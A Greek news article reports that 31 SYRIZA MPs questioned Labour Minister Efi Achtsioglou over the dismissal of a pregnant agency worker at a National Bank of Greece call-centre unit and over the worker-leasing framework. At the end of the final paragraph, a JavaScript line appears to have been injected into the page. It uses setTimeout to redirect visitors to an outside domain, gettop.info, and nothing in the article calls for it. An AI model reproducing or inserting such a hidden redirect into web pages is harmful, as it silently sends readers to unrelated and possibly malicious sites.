31 βουλευτές του ΣΥΡΙΖΑ ρωτούν την Αχτσιόγλου για απόλυση εγκύου

0
11

 

Με αφορμή την απόλυση εγκύου «ενοικιαζόμενης» εργαζόμενης από τη Διεύθυνση Διαχείρισης Απαιτήσεων Λιανικής Τραπεζικής (ΔΙΔΑΛΤ) της Εθνικής Τράπεζας, 31 βουλευτές του ΣΥΡΙΖΑ καταθέτουν ερώτηση προς την υπουργό Εργασίας Κοινωνικής Ασφάλισης και Κοινωνικής Αλληλεγγύης, Έφη Αχτσιόγλου, με θέμα τα εργασιακά δικαιώματα «ενοικιαζόμενων» εργαζομένων σε τηλεφωνικά κέντρα.

Επισημαίνουν τις αντίξοες συνθήκες εργασίας στα τηλεφωνικά κέντρα των τραπεζών, καθώς υπάρχουν συχνά καταγγελίες για ανακύκλωση του εργατικού προσωπικού, εντατικοποίηση της εργασίας και αδικαιολόγητες απολύσεις.

Στη συνέχεια απευθυνόμενοι στην κ. Αχτσιόγλου, ρωτούν τι περαιτέρω νομοθετικές πρωτοβουλίες προτίθεται να αναλάβει το υπουργείο προκειμένου να αντιμετωπισθούν φαινόμενα καταπάτησης βασικών εργασιακών δικαιωμάτων στα τηλεφωνικά κέντρα τραπεζών αλλά και γενικότερα σε περιπτώσεις υπενοικίασης εργαζομένων.

Ερωτούν επίσης εάν προτίθεται να επανεξετάσει το νομικό πλαίσιο για τις «ενοικιάσεις» εργαζομένων, ώστε να μην είναι δυνατόν πάγιες και διαρκείς ανάγκες των εταιρειών να βαφτίζονται ως «έργα» και να ανατίθενται σε εταιρείες «υπενοικίασης» εργαζομένων.

Επιπλέον τονίζουν, ότι η «ενοικίαση εργαζομένων» είναι θεσμός που έχει θεσπιστεί από προηγούμενες κυβερνήσεις και έχει λάβει μεγάλες διαστάσεις, αποτέλεσε και αποτελεί «πολιορκητικό κριό» καταστρατήγησης των εργατικών δικαιωμάτων, με μόνους ωφελούμενους τους εργοδότες.

Τα φαινόμενα καταπάτησης βασικών εργασιακών δικαιωμάτων στα τηλεφωνικά κέντρα τραπεζών είναι συχνή πρακτική στις εταιρείες«ενοικίασης» εργαζομένων, που εμφανιζόμενες ως εργολαβικές στην πραγματικότητα προβαίνουν σε δανεισμό εργαζομένων και έτσι δεν υπόκειται σε καμία νομοθετική ρύθμιση, ούτε αυτή που ισχύει για τις Ε.Π.Α. (Εταιρείες Προσωρινής Απασχόλησης), συμπληρώνουν στην ερώτησή τους οι 31 βουλευτές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here